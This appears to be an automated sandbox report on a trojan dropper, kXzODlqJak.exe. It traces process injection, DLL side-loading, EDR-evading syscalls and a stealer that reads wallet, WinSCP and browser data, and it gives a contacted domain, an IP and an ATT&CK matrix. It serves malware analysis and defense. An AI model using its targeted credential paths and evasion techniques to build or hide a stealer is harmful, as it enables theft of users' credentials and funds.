Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799B3730DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999F2437Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799A81386Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF799A68213Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799BE5ABEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B386E2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF799B5DD18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B45695Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799A81DA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799BDEB94
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF799A9CC2EJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x700A7B9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF7999E4267Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B45603Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799B95106Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A7B5DBJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF799A71459Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF7999E40C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999EA27EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtTerminateProcess: Direct from: 0x7FF799A801F5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799BDFE30Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 26D010Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 351010Jump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096DA1F InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,1_2_0096DA1F
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096B493 AllocateAndInitializeSid,CheckTokenMembership,1_2_0096B493
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000003.00000002.1515298893.000000006CE5E000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000004.00000002.1574385035.000000006BDBE000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: kChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00957255 cpuid 1_2_00957255
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6D484C5D
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_6D484C99
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_6D484965
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_6D48490A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_6D484863
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_6D484B36
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6D484BF6
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_6D47C51C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_6D48476E
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_6D48428A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_6D483F9C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_6D485593
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_6D4794E4
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoA,2_2_6D47B4F8
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_6D4854B9
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_6D483340
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,3_2_6C63750C
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,3_2_6C63767A
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,3_2_6C637270
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6C6AF2EF
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,3_2_6C6352E4
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6C6AF356
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,3_2_6C6373B4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0092BB84 ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,LocalFree,1_2_0092BB84
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096A805 EnterCriticalSection,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,LeaveCriticalSection,1_2_0096A805
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00919360 GetUserNameW,GetLastError,1_2_00919360
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0097BA41 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,1_2_0097BA41
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4628F4 __EH_prolog3_GS,_memset,GetVersionExW,GetVersionExW,GetVersionExW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,2_2_6D4628F4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.defaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-releaseJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Native API		11
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Deobfuscate/Decode Files or Information		1
OS Credential Dumping		12
System Time Discovery		Remote Services11
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
Windows Service		11
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Credentials in Registry		1
Account Discovery		Remote Desktop Protocol11
Data from Local System		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution		Logon Script (Windows)1
Access Token Manipulation		4
Obfuscated Files or Information		Security Account Manager13
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Windows Service		1
Software Packing		NTDS147
System Information Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script213
Process Injection		11
DLL Side-Loading		LSA Secrets221
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials3
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Masquerading		DCSync11
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Virtualization/Sandbox Evasion		Proc Filesystem1
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron213
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586711 Sample: kXzODlqJak.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 92 86 bamarelakij.site 2->86 88 api.msn.com 2->88 114 Multi AV Scanner detection for submitted file 2->114 116 AI detected suspicious sample 2->116 13 kXzODlqJak.exe 8 2->13         started        16 RescueCDBurner.exe 1 2->16         started        19 msedge.exe 2->19         started        signatures3 process4 dnsIp5 84 C:\Windows\Temp\...\kXzODlqJak.exe, PE32 13->84 dropped 22 kXzODlqJak.exe 21 13->22         started        102 Maps a DLL or memory area into another process 16->102 104 Found direct / indirect Syscall (likely to bypass EDR) 16->104 26 cmd.exe 2 16->26         started        90 192.168.2.7, 123, 138, 443 unknown unknown 19->90 92 239.255.255.250 unknown Reserved 19->92 28 msedge.exe 19->28         started        31 msedge.exe 19->31         started        33 msedge.exe 19->33         started        35 msedge.exe 19->35         started        file6 signatures7 process8 dnsIp9 74 C:\Windows\Temp\...\RescueCDBurner.exe, PE32 22->74 dropped 76 C:\Windows\Temp\...\msvcr100.dll, PE32 22->76 dropped 78 C:\Windows\Temp\...\msvcp100.dll, PE32 22->78 dropped 82 6 other files (none is malicious) 22->82 dropped 132 Multi AV Scanner detection for dropped file 22->132 37 RescueCDBurner.exe 11 22->37         started        80 C:\Users\user\AppData\Local\...\qpfwaekftwavc, PE32+ 26->80 dropped 134 Writes to foreign memory regions 26->134 136 Maps a DLL or memory area into another process 26->136 41 LocalCtrl_alpha_v3.exe 26->41         started        43 conhost.exe 26->43         started        96 18.173.219.111, 443, 50029, 50038 MIT-GATEWAYSUS United States 28->96 98 20.110.205.119, 443, 50028, 50057 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->98 100 17 other IPs or domains 28->100 file10 signatures11 process12 file13 66 C:\Users\user\AppData\...\RescueCDBurner.exe, PE32 37->66 dropped 68 C:\Users\user\AppData\...\msvcr100.dll, PE32 37->68 dropped 70 C:\Users\user\AppData\...\msvcp100.dll, PE32 37->70 dropped 72 5 other files (none is malicious) 37->72 dropped 124 Switches to a custom stack to bypass stack traces 37->124 126 Found direct / indirect Syscall (likely to bypass EDR) 37->126 45 RescueCDBurner.exe 1 37->45         started        128 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 41->128 130 Tries to harvest and steal browser information (history, passwords, etc) 41->130 signatures14 process15 signatures16 138 Maps a DLL or memory area into another process 45->138 140 Switches to a custom stack to bypass stack traces 45->140 142 Found direct / indirect Syscall (likely to bypass EDR) 45->142 48 cmd.exe 5 45->48         started        process17 file18 62 C:\Users\user\...\LocalCtrl_alpha_v3.exe, PE32+ 48->62 dropped 64 C:\Users\user\AppData\Local\Temp\oeqwwe, PE32+ 48->64 dropped 106 Writes to foreign memory regions 48->106 108 Found hidden mapped module (file has been removed from disk) 48->108 110 Maps a DLL or memory area into another process 48->110 112 Switches to a custom stack to bypass stack traces 48->112 52 LocalCtrl_alpha_v3.exe 48->52         started        56 conhost.exe 48->56         started        signatures19 process20 dnsIp21 94 bamarelakij.site 104.21.80.52, 443, 49973, 49974 CLOUDFLARENETUS United States 52->94 118 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 52->118 120 Tries to harvest and steal Bitcoin Wallet information 52->120 122 Found direct / indirect Syscall (likely to bypass EDR) 52->122 58 msedge.exe 52->58         started        signatures22 process23 process24 60 msedge.exe 58->60         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
kXzODlqJak.exe45%ReversingLabsWin32.Trojan.Nekark

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe3%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dll0%ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\Ascidian.dll0%ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtCore4.dll0%ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtGui4.dll0%ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtNetwork4.dll0%ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtXml4.dll0%ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe3%ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\StarBurn.dll0%ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcp100.dll0%ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dll0%ReversingLabs
C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe29%ReversingLabsWin32.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://downloads.reneelab.com.cn/download_api.php0%Avira URL Cloudsafe
http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia0%Avira URL Cloudsafe
https://downloads.reneelab.com/download_api.php0%Avira URL Cloudsafe
http://www.reneelab.fr/0%Avira URL Cloudsafe
